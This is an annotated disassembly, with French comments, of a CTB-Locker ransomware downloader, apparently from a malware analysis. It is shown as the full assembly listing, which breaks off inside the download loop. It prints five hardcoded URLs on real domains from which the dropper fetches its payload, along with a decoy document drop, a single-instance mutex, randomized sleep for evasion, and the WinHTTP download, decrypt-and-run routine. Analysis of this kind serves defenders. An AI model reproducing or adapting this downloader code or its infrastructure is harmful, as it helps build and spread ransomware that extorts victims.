CTB-Locker : downloader code

.idata:00401000 ; .idata:00401000 ; +-------------------------------------------------------------------------+ .idata:00401000 ; | This file is generated by The Interactive Disassembler (IDA) | .idata:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | .idata:00401000 ; | Licensed to: | .idata:00401000 ; +-------------------------------------------------------------------------+ .idata:00401000 ; .idata:00401000 ; Input MD5 : 48C9B4DBFB4B163B0ABB03F74E1834B1 .idata:00401000 .idata:00401000 ; File Name : CTB-Locker_downloader.bin .idata:00401000 ; Format : Portable executable for 80386 (PE) .idata:00401000 ; Imagebase : 400000 .idata:00401000 ; Section 1. (virtual address 00001000) .idata:00401000 ; Virtual size : 00001110 ( 4368.) .idata:00401000 ; Section size in file : 00001200 ( 4608.) .idata:00401000 ; Offset to raw data for section: 00000200 .idata:00401000 ; Flags E0000020: Text Executable Readable Writable .idata:00401000 ; Alignment : default .idata:00401000 ; .idata:00401000 ; Imports from KERNEL32.dll .idata:00401000 ; .idata:00401000 .idata:00401000 include uni.inc ; see unicode subdir of ida for info on unicode .idata:00401000 .idata:00401000 .686p .idata:00401000 .mmx .idata:00401000 .model flat .idata:00401000 .idata:00401000 ; =========================================================================== .idata:00401000 .idata:00401000 ; Segment type: Externs .idata:00401000 ; _idata .idata:00401000 ; void __stdcall ExitProcess(UINT uExitCode) .idata:00401000 ?? ?? ?? ?? extrn ExitProcess:dword ; CODE XREF: start+24Dp .idata:00401000 ; ErrorMsgBox+3Ep .idata:00401000 ; DATA XREF: ... .idata:00401004 ; HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType) .idata:00401004 ?? ?? ?? ?? extrn FindResourceA:dword .idata:00401004 ; CODE XREF: start+BCp .idata:00401004 ; start+D7p .idata:00401004 ; DATA XREF: ... .idata:00401008 ; HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo) .idata:00401008 ?? ?? ?? ?? extrn LoadResource:dword .idata:00401008 ; CODE XREF: start+F2p .idata:00401008 ; start+FEp .idata:00401008 ; DATA XREF: ... .idata:0040100C ; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType) .idata:0040100C ?? ?? ?? ?? extrn VirtualFree:dword ; CODE XREF: start+2A0p .idata:0040100C ; downloadPayload+199p .idata:0040100C ; DATA XREF: ... .idata:00401010 ; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped) .idata:00401010 ?? ?? ?? ?? extrn WriteFile:dword ; CODE XREF: start+1A8p .idata:00401010 ; executePayload+75p .idata:00401010 ; DATA XREF: ... .idata:00401014 ; void __stdcall Sleep(DWORD dwMilliseconds) .idata:00401014 ?? ?? ?? ?? extrn Sleep:dword ; CODE XREF: start+264p .idata:00401014 ; start+2BCp ... .idata:00401018 ; DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo) .idata:00401018 ?? ?? ?? ?? extrn SizeofResource:dword .idata:00401018 ; CODE XREF: start+11Ep .idata:00401018 ; DATA XREF: start+11Er .idata:0040101C ; DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize) .idata:0040101C ?? ?? ?? ?? extrn GetModuleFileNameW:dword .idata:0040101C ; CODE XREF: start+1D0p .idata:0040101C ; DATA XREF: start+1D0r .idata:00401020 ; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile) .idata:00401020 ?? ?? ?? ?? extrn CreateFileW:dword ; CODE XREF: start+185p .idata:00401020 ; executePayload+5Bp .idata:00401020 ; DATA XREF: ... .idata:00401024 ; int __stdcall lstrlenW(LPCWSTR lpString) .idata:00401024 ?? ?? ?? ?? extrn lstrlenW:dword ; CODE XREF: CallBackFileCAB+2Bp .idata:00401024 ; downloadPayload+52p ... .idata:00401028 ; DWORD __stdcall GetTempPathW(DWORD nBufferLength, LPWSTR lpBuffer) .idata:00401028 ?? ?? ?? ?? extrn GetTempPathW:dword .idata:00401028 ; CODE XREF: start+12Ep .idata:00401028 ; DATA XREF: start+12Er .idata:0040102C ; DWORD __stdcall GetLastError() .idata:0040102C ?? ?? ?? ?? extrn GetLastError:dword .idata:0040102C ; CODE XREF: start+23Fp .idata:0040102C ; DATA XREF: start+23Fr .idata:00401030 ; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName) .idata:00401030 ?? ?? ?? ?? extrn GetProcAddress:dword .idata:00401030 ; CODE XREF: LoadUsefullLibraries+7Bp .idata:00401030 ; LoadUsefullLibraries+88p ... .idata:00401034 ; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) .idata:00401034 ?? ?? ?? ?? extrn VirtualAlloc:dword .idata:00401034 ; CODE XREF: start+75p .idata:00401034 ; start+82p ... .idata:00401038 ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName) .idata:00401038 ?? ?? ?? ?? extrn LoadLibraryA:dword .idata:00401038 ; CODE XREF: LoadUsefullLibraries+11p .idata:00401038 ; LoadUsefullLibraries+1Ap ... .idata:0040103C ; LPVOID __stdcall LockResource(HGLOBAL hResData) .idata:0040103C ?? ?? ?? ?? extrn LockResource:dword .idata:0040103C ; CODE XREF: start+113p .idata:0040103C ; DATA XREF: start+113r .idata:00401040 ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName) .idata:00401040 ?? ?? ?? ?? extrn GetModuleHandleA:dword .idata:00401040 ; CODE XREF: start+D0p .idata:00401040 ; start+EBp .idata:00401040 ; DATA XREF: ... .idata:00401044 ; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName) .idata:00401044 ?? ?? ?? ?? extrn CreateMutexA:dword .idata:00401044 ; CODE XREF: start+239p .idata:00401044 ; DATA XREF: start+239r .idata:00401048 ; BOOL __stdcall CloseHandle(HANDLE hObject) .idata:00401048 ?? ?? ?? ?? extrn CloseHandle:dword ; CODE XREF: start+1AFp .idata:00401048 ; executePayload+7Ep .idata:00401048 ; DATA XREF: ... .idata:0040104C ; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName) .idata:0040104C ?? ?? ?? ?? extrn DeleteFileW:dword ; CODE XREF: executePayload+C3p .idata:0040104C ; DATA XREF: executePayload+C3r .idata:00401050 .idata:00401054 ; .idata:00401054 ; Imports from USER32.dll .idata:00401054 ; .idata:00401054 ; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) .idata:00401054 ?? ?? ?? ?? extrn MessageBoxA:dword ; CODE XREF: ErrorMsgBox+36p .idata:00401054 ; DATA XREF: ErrorMsgBox+36r .idata:00401054 .text:00401058 ; =========================================================================== .text:00401058 .text:00401058 ; Segment type: Pure code .text:00401058 ; Segment permissions: Read/Write/Execute .text:00401058 _text segment para public 'CODE' use32 .text:00401058 assume cs:_text .text:00401058 ;org 401058h .text:00401058 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing .text:00401058 00 00 00 00 00 00+ align 10h .text:00401060 aShopOye_itXxxi: ; DATA XREF: start+32o .text:00401060 73 00 68 00 6F 00+ unicode 0, <shop-oye.it/XXXinstallXXX/abc.tar.gz>,0 .text:004010AA 00 00 align 4 .text:004010AC aAspiroflash_fr: ; DATA XREF: start+39o .text:004010AC 61 00 73 00 70 00+ unicode 0, <aspiroflash.fr/cai/abc.tar.gz>,0 .text:004010E8 aDieideenwerkst: ; DATA XREF: start+40o .text:004010E8 64 00 69 00 65 00+ unicode 0, <dieideenwerkstatt.at/css/abc.tar.gz>,0 .text:00401130 aFirststepbaham: ; DATA XREF: start+47o .text:00401130 66 00 69 00 72 00+ unicode 0, <firststepbahamas.com/PDF/abc.tar.gz>,0 .text:00401178 aWymianaWsb_cba: ; DATA XREF: start+4Eo .text:00401178 77 00 79 00 6D 00+ unicode 0, <wymiana-wsb.cba.pl/pp/abc.tar.gz>,0 .text:004011BA 00 00 align 4 .text:004011BC 70 6F 6B 6A 75 73+aPokjuszo db 'pokjuszo',0 ; DATA XREF: start+16o .text:004011C5 00 00 00 align 4 .text:004011C8 ; char Type[] .text:004011C8 44 41 54 41 00 Type db 'DATA',0 ; DATA XREF: start+AFo .text:004011C8 ; start+C5o .text:004011CD 00 00 00 align 10h .text:004011D0 aSS: ; DATA XREF: start+155o .text:004011D0 ; executePayload+2Eo .text:004011D0 25 00 73 00 25 00+ unicode 0, <%s%s>,0 .text:004011DA 00 00 align 4 .text:004011DC aAeoiuy_: ; DATA XREF: BuildCredibleFileName+Co .text:004011DC 61 00 65 00 6F 00+ unicode 0, <aeoiuy.>,0 .text:004011EC aQwrtpsdfghjklz: ; DATA XREF: BuildCredibleFileName+24o .text:004011EC 71 00 77 00 72 00+ unicode 0, <qwrtpsdfghjklzxcvbnm>,0 .text:00401216 00 00 align 4 .text:00401218 aTxtrtfdocchmhl: ; DATA XREF: BuildCredibleFileName+37o .text:00401218 74 00 78 00 74 00+ unicode 0, <txtrtfdocchmhlpttfpdffb2xlspptmdbcdawavwmamp3avimpgmdvflv> .text:00401218 72 00 74 00 66 00+ unicode 0, <swfwmvvobbmpgifjpgpngisomdfmdsbindatnrg3gpoggvobexedll>,0 .text:004012F8 45 72 72 6F 72 20+aErrorCodeD db 'Error code #%d',0 ; DATA XREF: ErrorMsgBox+12o .text:00401307 00 align 4 .text:00401308 ; char Caption[] .text:00401308 45 72 72 6F 72 00 Caption db 'Error',0 ; DATA XREF: ErrorMsgBox+28o .text:0040130E 00 00 align 10h .text:00401310 ; char LibFileName[] .text:00401310 53 48 4C 57 41 50+LibFileName db 'SHLWAPI.DLL',0 ; DATA XREF: LoadUsefullLibraries+Co .text:0040131C ; char aSetupapi_dll[] .text:0040131C 53 45 54 55 50 41+aSetupapi_dll db 'SETUPAPI.DLL',0 ; DATA XREF: LoadUsefullLibraries+13o .text:00401329 00 00 00 align 4 .text:0040132C ; char aShell32_dll[] .text:0040132C 53 48 45 4C 4C 33+aShell32_dll db 'SHELL32.DLL',0 ; DATA XREF: LoadUsefullLibraries+1Co .text:00401338 ; char aWinhttp_dll[] .text:00401338 57 49 4E 48 54 54+aWinhttp_dll db 'WINHTTP.DLL',0 ; DATA XREF: LoadUsefullLibraries+25o .text:00401344 ; char aAdvapi32_dll[] .text:00401344 41 44 56 41 50 49+aAdvapi32_dll db 'ADVAPI32.DLL',0 ; DATA XREF: LoadUsefullLibraries+30o .text:00401351 00 00 00 align 4 .text:00401354 ; char ProcName[] .text:00401354 77 6E 73 70 72 69+ProcName db 'wnsprintfA',0 ; DATA XREF: LoadUsefullLibraries+75o .text:0040135F 00 align 10h .text:00401360 ; char aWnsprintfw[] .text:00401360 77 6E 73 70 72 69+aWnsprintfw db 'wnsprintfW',0 ; DATA XREF: LoadUsefullLibraries+7Do .text:0040136B 00 align 4 .text:0040136C ; char aSetupiterateca[] .text:0040136C 53 65 74 75 70 49+aSetupiterateca db 'SetupIterateCabinetW',0 .text:0040136C 74 65 72 61 74 65+ ; DATA XREF: LoadUsefullLibraries+8Ao .text:00401381 00 00 00 align 4 .text:00401384 ; char aShellexecutew[] .text:00401384 53 68 65 6C 6C 45+aShellexecutew db 'ShellExecuteW',0 ; DATA XREF: LoadUsefullLibraries+97o .text:00401392 00 00 align 4 .text:00401394 ; char aStrstriw[] .text:00401394 53 74 72 53 74 72+aStrstriw db 'StrStrIW',0 ; DATA XREF: LoadUsefullLibraries+A7o .text:0040139D 00 00 00 align 10h .text:004013A0 ; char aSystemfunction[] .text:004013A0 53 79 73 74 65 6D+aSystemfunction db 'SystemFunction036',0 .text:004013A0 46 75 6E 63 74 69+ ; DATA XREF: LoadUsefullLibraries+B4o .text:004013B2 00 00 align 4 .text:004013B4 ; char aWinhttpqueryda[] .text:004013B4 57 69 6E 48 74 74+aWinhttpqueryda db 'WinHttpQueryDataAvailable',0 .text:004013B4 70 51 75 65 72 79+ ; DATA XREF: LoadUsefullLibraries+C4o .text:004013CE 00 00 align 10h .text:004013D0 ; char aWinhttpreceive[] .text:004013D0 57 69 6E 48 74 74+aWinhttpreceive db 'WinHttpReceiveResponse',0 .text:004013D0 70 52 65 63 65 69+ ; DATA XREF: LoadUsefullLibraries+D1o .text:004013E7 00 align 4 .text:004013E8 ; char aWinhttpsendreq[] .text:004013E8 57 69 6E 48 74 74+aWinhttpsendreq db 'WinHttpSendRequest',0 .text:004013E8 70 53 65 6E 64 52+ ; DATA XREF: LoadUsefullLibraries+DEo .text:004013FB 00 align 4 .text:004013FC ; char aWinhttpsetopti[] .text:004013FC 57 69 6E 48 74 74+aWinhttpsetopti db 'WinHttpSetOption',0 ; DATA XREF: LoadUsefullLibraries+EBo .text:0040140D 00 00 00 align 10h .text:00401410 ; char aWinhttpopenreq[] .text:00401410 57 69 6E 48 74 74+aWinhttpopenreq db 'WinHttpOpenRequest',0 .text:00401410 70 4F 70 65 6E 52+ ; DATA XREF: LoadUsefullLibraries+F8o .text:00401423 00 align 4 .text:00401424 ; char aWinhttpconnect[] .text:00401424 57 69 6E 48 74 74+aWinhttpconnect db 'WinHttpConnect',0 ; DATA XREF: LoadUsefullLibraries+105o .text:00401433 00 align 4 .text:00401434 ; char aWinhttpopen[] .text:00401434 57 69 6E 48 74 74+aWinhttpopen db 'WinHttpOpen',0 ; DATA XREF: LoadUsefullLibraries+112o .text:00401440 ; char aWinhttpreaddat[] .text:00401440 57 69 6E 48 74 74+aWinhttpreaddat db 'WinHttpReadData',0 ; DATA XREF: LoadUsefullLibraries+11Fo .text:00401450 aSS_S: ; DATA XREF: CallBackFileCAB+87o .text:00401450 25 00 73 00 25 00+ unicode 0, <%s%s.%s>,0 .text:00401460 aS: ; DATA XREF: CallBackFileCAB+A2o .text:00401460 ; downloadPayload+1Bo .text:00401460 25 00 73 00 00 00 unicode 0, <%s>,0 .text:00401466 00 00 align 4 .text:00401468 asc_401468: ; DATA XREF: downloadPayload+Co .text:00401468 2F 00 00 00 unicode 0, </>,0 .text:0040146C 00 00 00 00 align 10h .text:00401470 aMozilla4_0Comp: ; DATA XREF: downloadPayload+69o .text:00401470 4D 00 6F 00 7A 00+ unicode 0, <Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)>,0 .text:004014D6 00 00 align 4 .text:004014D8 aGet: ; DATA XREF: downloadPayload+B6o .text:004014D8 47 00 45 00 54 00+ unicode 0, <GET>,0 .text:004014E0 .text:004014E0 ; =============== S U B R O U T I N E ======================================= .text:004014E0 .text:004014E0 ; Attributes: noreturn bp-based frame .text:004014E0 .text:004014E0 ; int __cdecl start(HMODULE hModule) .text:004014E0 public start .text:004014E0 start proc near .text:004014E0 .text:004014E0 Filename = word ptr -0A4Ch .text:004014E0 FileName = word ptr -64Ch .text:004014E0 var_24C = byte ptr -24Ch .text:004014E0 Name = byte ptr -44h .text:004014E0 lpString = dword ptr -38h .text:004014E0 var_34 = word ptr -34h .text:004014E0 var_30 = dword ptr -30h .text:004014E0 var_2C = word ptr -2Ch .text:004014E0 var_28 = dword ptr -28h .text:004014E0 var_24 = word ptr -24h .text:004014E0 var_20 = dword ptr -20h .text:004014E0 var_1C = word ptr -1Ch .text:004014E0 var_18 = dword ptr -18h .text:004014E0 var_14 = word ptr -14h .text:004014E0 NumberOfBytesWritten= dword ptr -10h .text:004014E0 var_C = dword ptr -0Ch .text:004014E0 lpBuffer = dword ptr -8 .text:004014E0 dwMilliseconds = dword ptr -4 .text:004014E0 hModule = dword ptr 8 .text:004014E0 .text:004014E0 55 push ebp .text:004014E1 8B EC mov ebp, esp .text:004014E3 81 EC 4C 0A 00 00 sub esp, 0A4Ch .text:004014E9 53 push ebx .text:004014EA 56 push esi .text:004014EB 57 push edi .text:004014EC 6A 24 push 24h .text:004014EE 58 pop eax .text:004014EF 6A 1D push 1Dh .text:004014F1 66 89 45 CC mov [ebp+var_34], ax .text:004014F5 58 pop eax .text:004014F6 BE BC 11 40 00 mov esi, offset aPokjuszo ; "pokjuszo" .text:004014FB 8D 7D BC lea edi, [ebp+Name] .text:004014FE A5 movsd .text:004014FF 6A 23 push 23h .text:00401501 66 89 45 D4 mov [ebp+var_2C], ax .text:00401505 58 pop eax .text:00401506 A5 movsd .text:00401507 66 89 45 DC mov [ebp+var_24], ax .text:0040150B 66 89 45 E4 mov [ebp+var_1C], ax .text:0040150F 6A 20 push 20h .text:00401511 58 pop eax .text:00401512 C7 45 C8 60 10 40+ mov [ebp+lpString], offset aShopOye_itXxxi ; "shop-oye.it/XXXinstallXXX/abc.tar.gz" .text:00401519 C7 45 D0 AC 10 40+ mov [ebp+var_30], offset aAspiroflash_fr ; "aspiroflash.fr/cai/abc.tar.gz" .text:00401520 C7 45 D8 E8 10 40+ mov [ebp+var_28], offset aDieideenwerkst ; "dieideenwerkstatt.at/css/abc.tar.gz" .text:00401527 C7 45 E0 30 11 40+ mov [ebp+var_20], offset aFirststepbaham ; "firststepbahamas.com/PDF/abc.tar.gz" .text:0040152E C7 45 E8 78 11 40+ mov [ebp+var_18], offset aWymianaWsb_cba ; "wymiana-wsb.cba.pl/pp/abc.tar.gz" .text:00401535 66 89 45 EC mov [ebp+var_14], ax .text:00401539 A4 movsb .text:0040153A E8 85 04 00 00 call LoadUsefullLibraries .text:0040153F 8B 35 34 10 40 00 mov esi, VirtualAlloc .text:00401545 6A 04 push 4 ; flProtect .text:00401547 BF 00 10 00 00 mov edi, 1000h .text:0040154C 57 push edi ; flAllocationType .text:0040154D BB 00 02 00 00 mov ebx, 200h .text:00401552 53 push ebx ; dwSize .text:00401553 6A 00 push 0 ; lpAddress .text:00401555 FF D6 call esi ; VirtualAlloc .text:00401557 6A 04 push 4 ; flProtect .text:00401559 57 push edi ; flAllocationType .text:0040155A 53 push ebx ; dwSize .text:0040155B 6A 00 push 0 ; lpAddress .text:0040155D A3 F8 1E 40 00 mov lpMemBlock1, eax .text:00401562 FF D6 call esi ; VirtualAlloc .text:00401564 6A 04 push 4 ; flProtect .text:00401566 57 push edi ; flAllocationType .text:00401567 53 push ebx ; dwSize .text:00401568 6A 00 push 0 ; lpAddress .text:0040156A A3 D8 1E 40 00 mov lpMemBlock2, eax .text:0040156F FF D6 call esi ; VirtualAlloc .text:00401571 6A 04 push 4 ; flProtect .text:00401573 57 push edi ; flAllocationType .text:00401574 6A 0C push 0Ch ; dwSize .text:00401576 6A 00 push 0 ; lpAddress .text:00401578 A3 EC 1E 40 00 mov lpMemBlock3, eax .text:0040157D FF D6 call esi ; VirtualAlloc .text:0040157F 6A 04 push 4 ; flProtect .text:00401581 57 push edi ; flAllocationType .text:00401582 6A 10 push 10h ; dwSize .text:00401584 33 FF xor edi, edi .text:00401586 57 push edi ; lpAddress .text:00401587 FF D6 call esi ; VirtualAlloc .text:00401589 8B 35 04 10 40 00 mov esi, FindResourceA .text:0040158F 68 C8 11 40 00 push offset Type ; "DATA" .text:00401594 68 E9 03 00 00 push 3E9h ; lpName .text:00401599 FF 75 08 push [ebp+hModule] ; hModule .text:0040159C FF D6 call esi ; FindResourceA .text:0040159E 89 45 F8 mov [ebp+lpBuffer], eax .text:004015A1 3B C7 cmp eax, edi .text:004015A3 75 35 jnz short loc_4015DA .text:004015A5 68 C8 11 40 00 push offset Type ; "DATA" .text:004015AA 68 E9 03 00 00 push 3E9h ; lpName .text:004015AF 57 push edi ; lpModuleName .text:004015B0 FF 15 40 10 40 00 call GetModuleHandleA .text:004015B6 50 push eax ; hModule .text:004015B7 FF D6 call esi ; FindResourceA .text:004015B9 8B F0 mov esi, eax .text:004015BB 3B F7 cmp esi, edi .text:004015BD 75 0A jnz short loc_4015C9 .text:004015BF 68 E8 03 00 00 push 3E8h .text:004015C4 .text:004015C4 EndProcessWithError: ; CODE XREF: start+110j .text:004015C4 ; start+197j ... .text:004015C4 E8 B6 03 00 00 call ErrorMsgBox ; ===========================> On sort ! .text:004015C9 ; --------------------------------------------------------------------------- .text:004015C9 .text:004015C9 loc_4015C9: ; CODE XREF: start+DDj .text:004015C9 56 push esi ; hResInfo .text:004015CA 57 push edi ; lpModuleName .text:004015CB FF 15 40 10 40 00 call GetModuleHandleA .text:004015D1 50 push eax ; hModule .text:004015D2 FF 15 08 10 40 00 call LoadResource .text:004015D8 EB 0D jmp short loc_4015E7 .text:004015DA ; --------------------------------------------------------------------------- .text:004015DA .text:004015DA loc_4015DA: ; CODE XREF: start+C3j .text:004015DA 50 push eax ; hResInfo .text:004015DB FF 75 08 push [ebp+hModule] ; hModule .text:004015DE FF 15 08 10 40 00 call LoadResource .text:004015E4 8B 75 F8 mov esi, [ebp+lpBuffer] .text:004015E7 .text:004015E7 loc_4015E7: ; CODE XREF: start+F8j .text:004015E7 3B C7 cmp eax, edi .text:004015E9 75 07 jnz short loc_4015F2 .text:004015EB 68 E9 03 00 00 push 3E9h .text:004015F0 EB D2 jmp short EndProcessWithError .text:004015F2 ; --------------------------------------------------------------------------- .text:004015F2 .text:004015F2 loc_4015F2: ; CODE XREF: start+109j .text:004015F2 50 push eax ; hResData .text:004015F3 FF 15 3C 10 40 00 call LockResource .text:004015F9 56 push esi ; hResInfo .text:004015FA 57 push edi ; hModule .text:004015FB 89 45 F8 mov [ebp+lpBuffer], eax ; On recupere le contenu du fichier .CAB a créer .text:004015FE FF 15 18 10 40 00 call SizeofResource .text:00401604 FF 35 D8 1E 40 00 push lpMemBlock2 ; lpBuffer .text:0040160A 89 45 FC mov [ebp+dwMilliseconds], eax .text:0040160D 53 push ebx ; nBufferLength .text:0040160E FF 15 28 10 40 00 call GetTempPathW .text:00401614 57 push edi .text:00401615 8D 85 B4 FD FF FF lea eax, [ebp+var_24C] .text:0040161B 6A 09 push 9 .text:0040161D 50 push eax .text:0040161E E8 98 01 00 00 call BuildCredibleFileName .text:00401623 8D 85 B4 FD FF FF lea eax, [ebp+var_24C] .text:00401629 50 push eax .text:0040162A FF 35 D8 1E 40 00 push lpMemBlock2 .text:00401630 BB FF 00 00 00 mov ebx, 0FFh .text:00401635 68 D0 11 40 00 push offset aSS ; "%s%s" .text:0040163A 8D 85 B4 F9 FF FF lea eax, [ebp+FileName] .text:00401640 53 push ebx .text:00401641 50 push eax .text:00401642 FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401648 83 C4 20 add esp, 20h .text:0040164B 57 push edi ; hTemplateFile .text:0040164C 68 80 00 00 00 push 80h ; dwFlagsAndAttributes .text:00401651 6A 02 push 2 ; dwCreationDisposition .text:00401653 57 push edi ; lpSecurityAttributes .text:00401654 6A 01 push 1 ; dwShareMode .text:00401656 68 00 00 00 40 push 40000000h ; dwDesiredAccess .text:0040165B 8D 85 B4 F9 FF FF lea eax, [ebp+FileName] .text:00401661 50 push eax ; lpFileName .text:00401662 89 7D F0 mov [ebp+NumberOfBytesWritten], edi .text:00401665 FF 15 20 10 40 00 call CreateFileW .text:0040166B 8B F0 mov esi, eax .text:0040166D 83 FE FF cmp esi, 0FFFFFFFFh .text:00401670 75 0A jnz short loc_40167C .text:00401672 68 EA 03 00 00 push 3EAh .text:00401677 E9 48 FF FF FF jmp EndProcessWithError .text:0040167C ; --------------------------------------------------------------------------- .text:0040167C .text:0040167C loc_40167C: ; CODE XREF: start+190j .text:0040167C 57 push edi ; lpOverlapped .text:0040167D 8D 45 F0 lea eax, [ebp+NumberOfBytesWritten] .text:00401680 50 push eax ; lpNumberOfBytesWritten .text:00401681 FF 75 FC push [ebp+dwMilliseconds] ; nNumberOfBytesToWrite .text:00401684 FF 75 F8 push [ebp+lpBuffer] ; lpBuffer .text:00401687 56 push esi ; hFile .text:00401688 FF 15 10 10 40 00 call WriteFile .text:0040168E 56 push esi ; hObject .text:0040168F FF 15 48 10 40 00 call CloseHandle ; =======> Le fichier CAB est créé sous locals settings\temp dans le profil de l'utilisateur .text:00401695 8B 45 FC mov eax, [ebp+dwMilliseconds] .text:00401698 39 45 F0 cmp [ebp+NumberOfBytesWritten], eax .text:0040169B 74 0A jz short loc_4016A7 .text:0040169D 68 EB 03 00 00 push 3EBh .text:004016A2 E9 1D FF FF FF jmp EndProcessWithError .text:004016A7 ; --------------------------------------------------------------------------- .text:004016A7 .text:004016A7 loc_4016A7: ; CODE XREF: start+1BBj .text:004016A7 53 push ebx ; nSize .text:004016A8 8D 85 B4 F5 FF FF lea eax, [ebp+Filename] .text:004016AE 50 push eax ; lpFilename .text:004016AF 57 push edi ; hModule .text:004016B0 FF 15 1C 10 40 00 call GetModuleFileNameW ; Va chercher le nom de fichier de l'exécutable en cours (le malware donc) .text:004016B0 ; sera utilisé pour fabriquer certains noms de fichiers ensuite (celui du .CAB) .text:004016B6 3B C7 cmp eax, edi .text:004016B8 75 0A jnz short loc_4016C4 .text:004016BA 68 EC 03 00 00 push 3ECh .text:004016BF E9 00 FF FF FF jmp EndProcessWithError .text:004016C4 ; --------------------------------------------------------------------------- .text:004016C4 .text:004016C4 loc_4016C4: ; CODE XREF: start+1D8j .text:004016C4 8B C8 mov ecx, eax .text:004016C6 8D 85 B4 F5 FF FF lea eax, [ebp+Filename] .text:004016CC E8 E6 04 00 00 call sub_401BB7 .text:004016D1 85 C0 test eax, eax .text:004016D3 75 0A jnz short loc_4016DF .text:004016D5 68 ED 03 00 00 push 3EDh .text:004016DA E9 E5 FE FF FF jmp EndProcessWithError .text:004016DF ; --------------------------------------------------------------------------- .text:004016DF .text:004016DF loc_4016DF: ; CODE XREF: start+1F3j .text:004016DF 57 push edi .text:004016E0 68 FC 1A 40 00 push offset CallBackFileCAB .text:004016E5 57 push edi .text:004016E6 8D 85 B4 F9 FF FF lea eax, [ebp+FileName] .text:004016EC 50 push eax .text:004016ED FF 15 F0 1E 40 00 call lpfSetupIterateCabinetW ; On va regarder ce qu'il y a dans le .CAB, récupérer le nom du fichier qu'il contient et extraire le fichier .text:004016F3 85 C0 test eax, eax .text:004016F5 75 0A jnz short loc_401701 .text:004016F7 68 EE 03 00 00 push 3EEh .text:004016FC E9 C3 FE FF FF jmp EndProcessWithError .text:00401701 ; --------------------------------------------------------------------------- .text:00401701 .text:00401701 loc_401701: ; CODE XREF: start+215j .text:00401701 6A 0A push 0Ah .text:00401703 57 push edi .text:00401704 57 push edi .text:00401705 FF 35 EC 1E 40 00 push lpMemBlock3 ; lpMemBlock3 contient le chemin complet et le nom du fichier contenu dans le .CAB avec la bonne extension, mais le nom du .cab (malware.rtf) .text:0040170B 57 push edi .text:0040170C 57 push edi .text:0040170D FF 15 DC 1E 40 00 call lpfShellExecuteW ; On va lancer le fichier. En l'occurrence cela va provoquer l'affichage du .rtf .text:00401713 8D 45 BC lea eax, [ebp+Name] .text:00401716 50 push eax ; lpName .text:00401717 57 push edi ; bInitialOwner .text:00401718 57 push edi ; lpMutexAttributes .text:00401719 FF 15 44 10 40 00 call CreateMutexA ; On crée un mutex pour être certain de n'exister qu'à une seule occurence .text:0040171F FF 15 2C 10 40 00 call GetLastError .text:00401725 3D B7 00 00 00 cmp eax, 0B7h ; Si le mutex existe déjà (0x0B7 => ERROR_ALREADY_EXISTS) c'est qu'une autre occurence de CTB_Locker tourne, dans ce cas on sort... .text:0040172A 75 07 jnz short loc_401733 .text:0040172C .text:0040172C endOfProcess: ; CODE XREF: start+2D6j .text:0040172C 57 push edi ; uExitCode .text:0040172D FF 15 00 10 40 00 call ExitProcess .text:00401733 ; --------------------------------------------------------------------------- .text:00401733 .text:00401733 loc_401733: ; CODE XREF: start+24Aj .text:00401733 68 90 D0 03 00 push 3D090h ; 250 000ms, soit 250 secondes ou 4 minutes et 10 secondes .text:00401738 B8 D0 DD 06 00 mov eax, 6DDD0h ; 450 000ms, soit 450 secondes ou 7 minutes 30 secondes .text:0040173D E8 5F 01 00 00 call randomizeEAX .text:00401742 59 pop ecx .text:00401743 50 push eax ; dwMilliseconds .text:00401744 FF 15 14 10 40 00 call Sleep ; On dort quelques temps (282 secondes par exemple)... .text:0040174A BB 88 13 00 00 mov ebx, 1388h .text:0040174F 89 7D F4 mov [ebp+var_C], edi .text:00401752 89 5D FC mov [ebp+dwMilliseconds], ebx .text:00401755 .text:00401755 loc_401755: ; CODE XREF: start+2C2j .text:00401755 8D 45 F8 lea eax, [ebp+lpBuffer] .text:00401758 50 push eax ; int .text:00401759 8B 45 F4 mov eax, [ebp+var_C] .text:0040175C FF 74 C5 C8 push [ebp+eax*8+lpString] ; lpString = un des noms de fichiers à télécharger (cf 0x401060) .text:00401760 E8 A8 04 00 00 call downloadPayload ; ==> On va downloader la charge ! .text:00401765 8B F0 mov esi, eax ; EAX = nb d'octets lus .text:00401767 59 pop ecx .text:00401768 59 pop ecx .text:00401769 3B F7 cmp esi, edi .text:0040176B 74 19 jz short loc_401786 .text:0040176D 8B 4D F8 mov ecx, [ebp+lpBuffer] .text:00401770 E8 52 01 00 00 call dechiffreEtVerifiePayload ; ==> On va déchiffrer et contrôler la charge .text:00401775 85 C0 test eax, eax .text:00401777 75 2B jnz short loc_4017A4 .text:00401779 68 00 80 00 00 push 8000h ; dwFreeType .text:0040177E 57 push edi ; dwSize .text:0040177F 56 push esi ; lpAddress .text:00401780 FF 15 0C 10 40 00 call VirtualFree ; On libère la mémoire allouée pour le payload .text:00401786 .text:00401786 loc_401786: ; CODE XREF: start+28Bj .text:00401786 FF 45 F4 inc [ebp+var_C] ; Si on a pas épuisé les 5 possibilités, on va tenter sur le serveur suivant... .text:00401789 83 7D F4 05 cmp [ebp+var_C], 5 